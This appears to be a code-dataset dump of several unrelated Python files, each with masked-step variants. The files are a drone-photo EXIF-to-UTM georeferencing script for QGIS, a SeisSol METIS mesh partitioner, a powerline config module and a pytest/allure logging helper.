{ "blob_id": "e92d770f9d2176b4943653b09ac1069fa3301e46", "index": 1931, "step-1": "import glob\r\nfrom PIL import Image\r\nfrom PIL.ExifTags import TAGS, GPSTAGS\r\nfrom pyproj import Proj\r\nfrom osgeo import gdal, osr\r\nfrom PyQt4.QtCore import QFile, QFileInfo\r\nimport os\r\nfrom os import walk\r\n#slika=\"c:\\slike\\Zito\\DJI_0060.jpg\"\r\n#georef_slika=\"c:\\Slike\\Zito\\Georeferencirana.tif\"\r\nradni_dir = 'c:/slike/Zito/testiranje/'\r\n#-----------------Izvlaci LAT LONG----------------------------------------------------------------------------\r\ndef exif(img):\r\n exif_data = {}\r\n try: \r\n i = Image.open(img)\r\n tags = i._getexif()\r\n for tag, value in tags.items():\r\n decoded = TAGS.get(tag, tag)\r\n exif_data[decoded] = value\r\n except:\r\n pass\r\n return exif_data\r\n \r\ndef dms2dd(d, m, s, i):\r\n sec = float((m * 60) + s)\r\n dec = float(sec / 3600)\r\n deg = float(d + dec)\r\n if i.upper() == \"W\":\r\n deg = deg * -1\r\n elif i.upper() == \"S\":\r\n deg = deg * -1\r\n return float(deg)\r\n \r\ndef gps(exif):\r\n lat = None\r\n lon = None\r\n if exif[\"GPSInfo\"]: \r\n # Lat\r\n coords = exif[\"GPSInfo\"]\r\n i = coords[1]\r\n d = coords[2][0][0]\r\n m = coords[2][1][0]\r\n s = coords[2][2][0]\r\n lat = dms2dd(d, m ,s, i)\r\n lat = float(str(d)+str(m)+str(s))/100000000\r\n # Lon\r\n i = coords[3]\r\n d = coords[4][0][0]\r\n m = coords[4][1][0]\r\n s = coords[4][2][0]\r\n lon = float(str(d)+str(m)+str(s))/100000000\r\n return lat, lon\r\n\r\n#------------------Pretvara LAT LONG u UTM----------------------------------------------------------------------------\r\ndef pretvarac(fotka):\r\n Lat = gps(exif(fotka))[0]\r\n Lon = gps(exif(fotka))[1]\r\n print \"Lon/Lat Koordinate slike: \", Lon, \" \",Lat\r\n ZoneNo = \"34T\" # rucno uneseno, a moze se izracunati unaprijed preko alt long\r\n myProj = Proj(\"+proj=utm +zone=\"+ZoneNo+\",+north +ellps=WGS84 +datum=WGS84 +units=m +no_defs\") # north za sjevernu hemisferu\r\n UTMx, UTMy = myProj(Lon, Lat)\r\n round(UTMx, 2)\r\n round(UTMy, 2)\r\n print \"UTM Koordinate slike: \", UTMx, \" \",UTMy\r\n global UTMx\r\n global UTMy\r\n return UTMx, UTMy\r\n\r\n#--------------------Georeferenciranje----------------------------------------------------------------------------\r\ndef georeferenciranje(src_filename,dst_filename):\r\n src_ds = gdal.Open(src_filename)\r\n format = \"GTiff\"\r\n driver = gdal.GetDriverByName(format)\r\n dst_ds = driver.CreateCopy(dst_filename, src_ds, 0)\r\n\r\n # Specify raster location through geotransform array\r\n # (uperleftx, scalex, skewx, uperlefty, skewy, scaley)\r\n # Scale = size of one pixel in units of raster projection\r\n # this example below assumes 100x100\r\n gt = [UTMx, 100, 0, UTMy, 0, -100]\r\n\r\n dst_ds.SetGeoTransform(gt)\r\n epsg = 3857\r\n srs = osr.SpatialReference()\r\n srs.ImportFromEPSG(epsg)\r\n dest_wkt = srs.ExportToWkt()\r\n dst_ds.SetProjection(dest_wkt)\r\n dst_ds = None\r\n src_ds = None\r\n#-----------------Ubacivanje u QGIS----------------------------------------------------------------------------\r\ndef ubacivanje(fileName):\r\n print \"ubacujem raster\"\r\n #fileName = dst_filename\r\n fileInfo = QFileInfo(fileName)\r\n baseName = fileInfo.baseName()\r\n rlayer = QgsRasterLayer(fileName, baseName)\r\n iface.addRasterLayer(fileName, \"Raster Layer Zito\")\r\n print \"raster ubacen\"\r\n\r\n#----------------Folder loop------------------------------------------------------------------------------------\r\nli = []\r\nl = 0\r\nos.chdir(radni_dir)\r\n#Uzima listu sa 
imenima slika ( li )\r\nfor file in glob.glob(\"*.jpg\"):\r\n li.append(os.path.splitext(file)[0])\r\n l+= 1\r\n pretvarac(file)\r\n gr = os.path.dirname(file)+str(l)+ '_georeferencirana'+'.tif'\r\n georeferenciranje(file,gr)\r\n ubacivanje(gr)\r\n \r\n\r\n\r\n\r\n#pretvarac(slika)\r\n#georeferenciranje(slika,georef_slika)\r\n#ubacivanje(georef_slika)\r\n\r\n\r\n\r\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
#!/usr/bin/python ## # @file # This file is part of SeisSol. # # @author Sebastian Rettenberger (rettenbs AT in.tum.de, http://www5.in.tum.de/wiki/index.php/Sebastian_Rettenberger,_M.Sc.) # # @section LICENSE # Copyright (c) 2013, SeisSol Group # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its # contributors may be used to endorse or promote products derived from this # software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. import metis import subprocess METIS_MESH = 'metis.mesh' METIS_GRAPH = 'metis.graph' class Partitioner: """Converts a mesh into graph and partitions it using metis""" def __init__(self, mesh, partitions, tmpdir): metisMesh = tmpdir.path(METIS_MESH) # Write metis mesh metis.MeshWriter(metisMesh, mesh.elements()) # Convert to graph metisGraph = tmpdir.path(METIS_GRAPH) p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh, metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, errmsg = p.communicate() if p.returncode: raise Exception(errmsg.strip()) # Run metis p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE) _, errmsg = p.communicate() if p.returncode: raise Exception(errmsg.strip()) # Read partitions self.__partition = metis.PartitionReader(metisGraph+'.part.'+str(partitions), partitions, len(mesh.elements())) if self.__partition.size() != len(mesh.elements()): raise Exception('Mesh size and partition size do not match: mesh size = ' +str(len(mesh.elements()))+' != partition size = '+str(self.__partition.size())) def partition(self): return self.__partition
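# --- Hedged usage sketch (not part of the dataset row above) ---
# Drives Partitioner with minimal stand-ins for the interfaces implied by
# the calls above: mesh.elements() and tmpdir.path(name). The m2gmetis and
# gpmetis binaries must be on PATH; the element list is hypothetical.
import os
import tempfile

class TmpDirSketch(object):
    """Maps file names into a throwaway directory, like tmpdir.path() above."""
    def __init__(self):
        self._dir = tempfile.mkdtemp()
    def path(self, name):
        return os.path.join(self._dir, name)

class MeshSketch(object):
    """Holds a list of tetrahedra, each given as four vertex ids."""
    def __init__(self, elements):
        self._elements = elements
    def elements(self):
        return self._elements

# partition = Partitioner(MeshSketch(elements), 4, TmpDirSketch()).partition()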
normal
{ "blob_id": "91e1ac12ba99a8efd8f7f26310244d83bdd4aa52", "index": 2510, "step-1": "<mask token>\n\n\nclass Partitioner:\n <mask token>\n\n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n metis.MeshWriter(metisMesh, mesh.elements())\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh,\n metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(\n partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n self.__partition = metis.PartitionReader(metisGraph + '.part.' +\n str(partitions), partitions, len(mesh.elements()))\n if self.__partition.size() != len(mesh.elements()):\n raise Exception(\n 'Mesh size and partition size do not match: mesh size = ' +\n str(len(mesh.elements())) + ' != partition size = ' + str(\n self.__partition.size()))\n\n def partition(self):\n return self.__partition\n", "step-2": "<mask token>\n\n\nclass Partitioner:\n \"\"\"Converts a mesh into graph and partitions it using metis\"\"\"\n\n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n metis.MeshWriter(metisMesh, mesh.elements())\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh,\n metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(\n partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n self.__partition = metis.PartitionReader(metisGraph + '.part.' +\n str(partitions), partitions, len(mesh.elements()))\n if self.__partition.size() != len(mesh.elements()):\n raise Exception(\n 'Mesh size and partition size do not match: mesh size = ' +\n str(len(mesh.elements())) + ' != partition size = ' + str(\n self.__partition.size()))\n\n def partition(self):\n return self.__partition\n", "step-3": "<mask token>\nMETIS_MESH = 'metis.mesh'\nMETIS_GRAPH = 'metis.graph'\n\n\nclass Partitioner:\n \"\"\"Converts a mesh into graph and partitions it using metis\"\"\"\n\n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n metis.MeshWriter(metisMesh, mesh.elements())\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh,\n metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(\n partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n self.__partition = metis.PartitionReader(metisGraph + '.part.' 
+\n str(partitions), partitions, len(mesh.elements()))\n if self.__partition.size() != len(mesh.elements()):\n raise Exception(\n 'Mesh size and partition size do not match: mesh size = ' +\n str(len(mesh.elements())) + ' != partition size = ' + str(\n self.__partition.size()))\n\n def partition(self):\n return self.__partition\n", "step-4": "import metis\nimport subprocess\nMETIS_MESH = 'metis.mesh'\nMETIS_GRAPH = 'metis.graph'\n\n\nclass Partitioner:\n \"\"\"Converts a mesh into graph and partitions it using metis\"\"\"\n\n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n metis.MeshWriter(metisMesh, mesh.elements())\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh,\n metisGraph], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(\n partitions)], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n self.__partition = metis.PartitionReader(metisGraph + '.part.' +\n str(partitions), partitions, len(mesh.elements()))\n if self.__partition.size() != len(mesh.elements()):\n raise Exception(\n 'Mesh size and partition size do not match: mesh size = ' +\n str(len(mesh.elements())) + ' != partition size = ' + str(\n self.__partition.size()))\n\n def partition(self):\n return self.__partition\n", "step-5": "#!/usr/bin/python\n##\n# @file\n# This file is part of SeisSol.\n#\n# @author Sebastian Rettenberger (rettenbs AT in.tum.de, http://www5.in.tum.de/wiki/index.php/Sebastian_Rettenberger,_M.Sc.)\n#\n# @section LICENSE\n# Copyright (c) 2013, SeisSol Group\n# All rights reserved.\n# \n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n# \n# 1. Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# \n# 2. Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# \n# 3. Neither the name of the copyright holder nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission.\n# \n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n# ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE\n# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR\n# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF\n# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS\n# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN\n# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)\n# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE\n# POSSIBILITY OF SUCH DAMAGE.\n\nimport metis\n\nimport subprocess\n\nMETIS_MESH = 'metis.mesh'\nMETIS_GRAPH = 'metis.graph'\n\nclass Partitioner:\n \"\"\"Converts a mesh into graph and partitions it using metis\"\"\"\n \n def __init__(self, mesh, partitions, tmpdir):\n metisMesh = tmpdir.path(METIS_MESH)\n \n # Write metis mesh\n metis.MeshWriter(metisMesh, mesh.elements())\n \n # Convert to graph\n metisGraph = tmpdir.path(METIS_GRAPH)\n p = subprocess.Popen(['m2gmetis', '-ncommon=3', metisMesh, metisGraph],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n \n # Run metis\n p = subprocess.Popen(['gpmetis', '-ptype=rb', metisGraph, str(partitions)],\n stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n _, errmsg = p.communicate()\n if p.returncode:\n raise Exception(errmsg.strip())\n \n # Read partitions\n self.__partition = metis.PartitionReader(metisGraph+'.part.'+str(partitions),\n partitions, len(mesh.elements()))\n \n if self.__partition.size() != len(mesh.elements()):\n raise Exception('Mesh size and partition size do not match: mesh size = '\n +str(len(mesh.elements()))+' != partition size = '+str(self.__partition.size()))\n \n def partition(self):\n return self.__partition\n", "step-ids": [ 3, 4, 5, 6, 7 ] }
[ 3, 4, 5, 6, 7 ]
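A usage sketch for the Partitioner row above (mesh and tmpdir are stand-ins for the project's own mesh and temporary-directory helpers, and the METIS binaries gpmetis/m2gmetis must be on PATH):

# mesh: object exposing elements(); tmpdir: object exposing path(name)
p = Partitioner(mesh, partitions=4, tmpdir=tmpdir)
partition = p.partition()  # one partition id per mesh element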
# vim:fileencoding=utf-8:noet from __future__ import absolute_import, unicode_literals, print_function import os BINDINGS_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bindings') TMUX_CONFIG_DIRECTORY = os.path.join(BINDINGS_DIRECTORY, 'tmux') DEFAULT_SYSTEM_CONFIG_DIR = None
normal
{ "blob_id": "c435b0f162512bb2bc0c35e1817f64c5ef9ff7bc", "index": 1871, "step-1": "<mask token>\n", "step-2": "<mask token>\nBINDINGS_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)\n ), 'bindings')\nTMUX_CONFIG_DIRECTORY = os.path.join(BINDINGS_DIRECTORY, 'tmux')\nDEFAULT_SYSTEM_CONFIG_DIR = None\n", "step-3": "from __future__ import absolute_import, unicode_literals, print_function\nimport os\nBINDINGS_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)\n ), 'bindings')\nTMUX_CONFIG_DIRECTORY = os.path.join(BINDINGS_DIRECTORY, 'tmux')\nDEFAULT_SYSTEM_CONFIG_DIR = None\n", "step-4": "# vim:fileencoding=utf-8:noet\n\nfrom __future__ import absolute_import, unicode_literals, print_function\nimport os\n\nBINDINGS_DIRECTORY = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'bindings')\nTMUX_CONFIG_DIRECTORY = os.path.join(BINDINGS_DIRECTORY, 'tmux')\nDEFAULT_SYSTEM_CONFIG_DIR = None\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
import json
import logging
import os
import sys
from io import StringIO

import pytest
from allure.constants import AttachmentType

from utils.tools import close_popups

_beautiful_json = dict(indent=2, ensure_ascii=False, sort_keys=True)

# LOGGING console ####################################################################################################
# Reserved names for custom logging levels
logging.addLevelName(15, "SUBDEBUG")
logging.addLevelName(5, "TEST")

# Logger formatting
log_formatter = logging.Formatter("%(asctime)s [%(threadName)s] [%(levelname)s] - %(message)s",
                                  datefmt='%Y-%m-%d %H:%M:%S')


class CustomLogger(logging.Logger):
    test_log = StringIO()

    # Method for formatting a message
    @staticmethod
    def format_message(message):
        return json.dumps(message, **_beautiful_json) if isinstance(message, (dict, list, tuple)) else str(message)

    # Custom logging level
    def subdebug(self, message, *args, **kwargs):
        if self.isEnabledFor(15):
            self._log(15, message, args, **kwargs)

    # Methods to attach data to the report (one class dependency)
    def attach_debug(self, name, message):
        if self.isEnabledFor(10):
            pytest.allure.attach(name, self.format_message(message))

    def attach_subdebug(self, name, message):
        if self.isEnabledFor(15):
            pytest.allure.attach(name, self.format_message(message))

    def attach_info(self, name, message):
        if self.isEnabledFor(20):
            pytest.allure.attach(name, self.format_message(message))

    def attach_error(self, name, message):
        pytest.allure.attach(name, self.format_message(message))

    @staticmethod
    def attach_png(name, message):
        pytest.allure.attach(name, message, type=AttachmentType.PNG)

    def attach_selenium_screenshot(self, attach_name, selenium_driver):
        if selenium_driver:
            try:
                close_popups(selenium_driver)
                self.debug('Attach screenshot')
                self.attach_png(attach_name, selenium_driver.get_screenshot_as_png())
                self.debug('...Done')
            except Exception as e:
                self.error('Cannot get screenshot from SeleniumWebDriver')
                pytest.allure.attach(attach_name, str(e))
        else:
            self.error('No browser is defined')

    def add_handler(self, file_name, mode='a'):
        file_handler = logging.FileHandler(filename=file_name, mode=mode)
        file_handler.setFormatter(log_formatter)
        file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))
        self.addHandler(file_handler)


def setup_logging():
    # Logging setup
    logger = CustomLogger('root')

    # Handler level
    console_handler = logging.StreamHandler(sys.stdout)
    console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))
    # Message format
    console_handler.setFormatter(log_formatter)
    logger.addHandler(console_handler)

    # Handler level
    string_io = logging.StreamHandler(logger.test_log)
    string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))
    # Message format
    string_io.setFormatter(log_formatter)
    logger.addHandler(string_io)
    return logger


logger = setup_logging()
normal
{ "blob_id": "37fdfddb471e2eec9e5867d685c7c56fc38c5ae7", "index": 8363, "step-1": "<mask token>\n\n\nclass CustomLogger(logging.Logger):\n <mask token>\n\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message,\n (dict, list, tuple)) else str(message)\n\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.\n get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\n<mask token>\n", "step-2": "<mask token>\nlogging.addLevelName(15, 'SUBDEBUG')\nlogging.addLevelName(5, 'TEST')\n<mask token>\n\n\nclass CustomLogger(logging.Logger):\n test_log = StringIO()\n\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message,\n (dict, list, tuple)) else str(message)\n\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.\n get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\ndef 
setup_logging():\n logger = CustomLogger('root')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n string_io = logging.StreamHandler(logger.test_log)\n string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))\n string_io.setFormatter(log_formatter)\n logger.addHandler(string_io)\n return logger\n\n\n<mask token>\n", "step-3": "<mask token>\n_beautiful_json = dict(indent=2, ensure_ascii=False, sort_keys=True)\nlogging.addLevelName(15, 'SUBDEBUG')\nlogging.addLevelName(5, 'TEST')\nlog_formatter = logging.Formatter(\n '%(asctime)s [%(threadName)s] [%(levelname)s] - %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n\n\nclass CustomLogger(logging.Logger):\n test_log = StringIO()\n\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message,\n (dict, list, tuple)) else str(message)\n\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.\n get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\ndef setup_logging():\n logger = CustomLogger('root')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n string_io = logging.StreamHandler(logger.test_log)\n string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))\n string_io.setFormatter(log_formatter)\n logger.addHandler(string_io)\n return logger\n\n\nlogger = setup_logging()\n", "step-4": "import json\nimport logging\nimport os\nimport sys\nfrom io import StringIO\nimport pytest\nfrom allure.constants import AttachmentType\nfrom utils.tools import close_popups\n_beautiful_json = dict(indent=2, ensure_ascii=False, sort_keys=True)\nlogging.addLevelName(15, 'SUBDEBUG')\nlogging.addLevelName(5, 'TEST')\nlog_formatter = logging.Formatter(\n '%(asctime)s [%(threadName)s] [%(levelname)s] - %(message)s', datefmt=\n '%Y-%m-%d %H:%M:%S')\n\n\nclass CustomLogger(logging.Logger):\n test_log = StringIO()\n\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if 
isinstance(message,\n (dict, list, tuple)) else str(message)\n\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n pytest.allure.attach(name, self.format_message(message))\n\n @staticmethod\n def attach_png(name, message):\n pytest.allure.attach(name, message, type=AttachmentType.PNG)\n\n def attach_selenium_screenshot(self, attach_name, selenium_driver):\n if selenium_driver:\n try:\n close_popups(selenium_driver)\n self.debug('Attach screenshot')\n self.attach_png(attach_name, selenium_driver.\n get_screenshot_as_png())\n self.debug('...Done')\n except Exception as e:\n self.error('Cannot get screenshot from SeleniumWebDriver')\n pytest.allure.attach(attach_name, str(e))\n else:\n self.error('No browser is define')\n\n def add_handler(self, file_name, mode='a'):\n file_handler = logging.FileHandler(filename=file_name, mode=mode)\n file_handler.setFormatter(log_formatter)\n file_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n self.addHandler(file_handler)\n\n\ndef setup_logging():\n logger = CustomLogger('root')\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setLevel(os.getenv('LOGGING_LEVEL_TO_CONSOLE', 'WARN'))\n console_handler.setFormatter(log_formatter)\n logger.addHandler(console_handler)\n string_io = logging.StreamHandler(logger.test_log)\n string_io.setLevel(os.getenv('LOGGING_LEVEL', 'INFO'))\n string_io.setFormatter(log_formatter)\n logger.addHandler(string_io)\n return logger\n\n\nlogger = setup_logging()\n", "step-5": "import json\nimport logging\nimport os\nimport sys\nfrom io import StringIO\n\nimport pytest\nfrom allure.constants import AttachmentType\n\nfrom utils.tools import close_popups\n\n_beautiful_json = dict(indent=2, ensure_ascii=False, sort_keys=True)\n\n# LOGGING console ####################################################################################################\n# Reserved name for custom logging\nlogging.addLevelName(15, \"SUBDEBUG\")\nlogging.addLevelName(5, \"TEST\")\n\n# Logger formating\nlog_formatter = logging.Formatter(\"%(asctime)s [%(threadName)s] [%(levelname)s] - %(message)s\",\n datefmt='%Y-%m-%d %H:%M:%S')\n\n\nclass CustomLogger(logging.Logger):\n test_log = StringIO()\n\n # Metod formating message\n @staticmethod\n def format_message(message):\n return json.dumps(message, **_beautiful_json) if isinstance(message, (dict, list, tuple)) else str(message)\n\n # Custom level of logging\n def subdebug(self, message, *args, **kwargs):\n if self.isEnabledFor(15):\n self._log(15, message, args, **kwargs)\n\n # Method to attached data to report (one class dependency)\n def attach_debug(self, name, message):\n if self.isEnabledFor(10):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_subdebug(self, name, message):\n if self.isEnabledFor(15):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_info(self, name, message):\n if self.isEnabledFor(20):\n pytest.allure.attach(name, self.format_message(message))\n\n def attach_error(self, name, message):\n 
